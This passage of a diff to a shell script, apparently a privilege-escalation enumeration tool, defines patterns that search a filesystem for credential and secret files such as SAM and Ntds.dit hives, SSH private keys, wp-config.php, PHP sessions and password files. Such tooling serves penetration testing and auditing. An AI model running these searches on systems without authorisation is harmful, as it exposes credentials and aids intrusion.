"unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/default/settings.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 'moodle/config.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e 